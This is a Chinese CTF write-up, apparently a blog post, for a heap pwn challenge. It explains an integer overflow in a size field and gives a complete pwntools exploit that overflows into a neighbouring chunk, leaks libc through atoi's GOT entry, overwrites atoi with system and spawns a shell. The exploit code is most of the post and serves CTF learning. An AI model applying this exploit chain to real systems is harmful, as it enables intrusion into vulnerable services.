
3ctf复赛wp

3ctf pwn writeup

唯一一道pwn题

漏洞点

emm,打比赛的时候没看出来:size 存在整数溢出,利用它这里就可以造成堆溢出了

漏洞利用

buf 是一开头就申请的、0x200 字节大小的缓冲区,所以 read(0, buf, size) 的时候如果 size 发生整数溢出,就可以无限制地溢出。溢出能覆盖后面好多个 chunk,这里只需要攻击第一个 chunk(fastbin 大小)就可以了:改掉它的结构体指针,然后改 atoi 就行了

exp

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
import base64

# Target selection and pwntools context.  `local` chooses between a
# spawned process and a remote socket (see the `io` setup below).
local = 1
host, port = '127.0.0.1', 10000

# Verbose I/O tracing; drop to 'info' for a quieter run.
context.log_level = 'debug'

# Challenge binary; its path is whatever the download landed in.
exe = '/tmp/tmp.lZOfZFQz3p/92226e82'
context.binary = exe

# ELF handle plus the libc pwntools resolves for it (used for symbol
# offsets once the base address is known).
elf = ELF(exe)
libc = elf.libc


# Open the transport: a local process when `local` is set, otherwise a
# socket to host:port.  Don't forget to change `local` before a remote run.
io = process(exe) if local else remote(host, port)

# Thin I/O helpers around the pwntools tube.  Every sender coerces its
# argument with str() so ints and other values can be passed directly.

def s(data):
    """Send str(data) with no trailing newline."""
    return io.send(str(data))


def sa(delim, data):
    """Wait for *delim*, then send str(data)."""
    return io.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return io.sendline(str(data))


def sla(delim, data):
    """Wait for *delim*, then send str(data) plus a newline."""
    return io.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to *numb* bytes (default 4096)."""
    return io.recv(numb)


def ru(delim, drop=True):
    """Receive up to and including *delim*; *drop* removes the delimiter."""
    return io.recvuntil(delim, drop)


def uu32(data):
    """Unpack a little-endian u32 from up to 4 bytes, zero-padded on the right."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack a little-endian u64 from up to 8 bytes, zero-padded on the right."""
    return u64(data.ljust(8, '\x00'))


def lg(name, data):
    """Log *data* as a hex value labelled *name* via io.success()."""
    return io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr, PIE=True):
    """Attach gdb to the running target with one breakpoint at *addr*.

    Args:
        addr: Breakpoint address.  With ``PIE`` it is an offset that is
            rebased onto the text segment; otherwise it is used as-is.
        PIE: When true the text base is read from the second line of
            ``pmap <pid>`` output and added to *addr*.

    Note: ``os`` and ``gdb`` are not imported explicitly in this file;
    presumably both come from ``from pwn import *`` -- verify if this is
    ever split into its own module.
    """
    if not PIE:
        gdb.attach(io, "b *{}".format(hex(addr)))
        return
    # First mapping line of pmap is the header, so index 1 is the text segment.
    mapping = os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1]
    text_base = int(mapping, 16)
    gdb.attach(io, 'b *{}'.format(hex(text_base + addr)))


#===========================================================
# EXPLOIT GOES HERE
#===========================================================

# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
def c(idx):
    """Select menu entry *idx*: wait for the choice prompt, then send it."""
    choice = str(idx)
    sla("Input your choice:", choice)

def base(content):
    """Return *content* base64-encoded (the challenge stores secrets that way)."""
    encoded = base64.b64encode(content)
    return encoded
def new(size, content, encode=False):
    """Create a secret through menu option 1.

    Args:
        size: Value sent to the "size of secret" prompt (sent verbatim via
            str(), so negative values reach the binary unchanged).
        content: Raw bytes sent at the "input your secret" prompt.
        encode: Selects the binary's encode(0) mode; the default picks
            decode(1).
    """
    c(1)
    sla("please input the size of secret\n", str(size))
    if encode:
        mode = "0"
    else:
        mode = "1"
    sla("Do you want encode(0) or decode(1) your secret ?", mode)
    sla("please input your secret:\n", content)

def edit(idx, content):
    """Overwrite secret *idx* with *content* through menu option 3."""
    c(3)
    index = str(idx)
    sla(":", index)
    sa(":\n", content)

def show(idx):
    """Print secret *idx* through menu option 2 (output is left in the tube)."""
    c(2)
    index = str(idx)
    sla(":", index)



def exp():
    """Run the exploit chain described in the writeup above.

    Root cause (per the writeup): the secret size is not range-checked
    before it is used as a read length, so a size of -1 lets the fourth
    write run past its buffer into the neighbouring chunks.  Rejecting
    sizes outside [0, buffer length] before the read is the fix.
    """
    # Three 0x200-byte secrets laid out back to back on the heap.
    new(0x200, base("1"*0x58))
    new(0x200, base("2"*0x58))
    new(0x200, base("3"*0x58))
    # Leftover debugger attach from development; it is unconditional here.
    gdb.attach(io)
    payload = flat([
        '\x00'*0x208,      # padding up to the next chunk's header
        0x21,              # presumably the overwritten chunk's size field -- confirm
        0x5b,              # struct field of the target chunk; meaning not documented here
        elf.got['atoi']    # pointer field redirected to atoi's GOT entry
    ])
    # size -1 bypasses the length check and carries the payload past the buffer.
    new(-1, payload, True)
    # Secret 0's pointer now references the GOT slot, so "show" leaks atoi's address.
    show(0)
    ru("your secret is:\n")
    libc.address = uu64(r(6)) - libc.sym['atoi']
    lg("libc_address", libc.address)
    system = libc.sym['system']
    # Writing through the same pointer replaces the GOT entry.
    edit(0, p64(system))
    # Next size prompt passes its input to the patched entry instead of atoi().
    sla("choice:", str(1))
    ru(" size of secret\n")
    s("sh\x00\x00")


# Script entry point: run the chain, then hand the tube to the user.
if __name__ == '__main__':
    exp()
    io.interactive()

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/28402fba/
版权声明:转载请注明出处!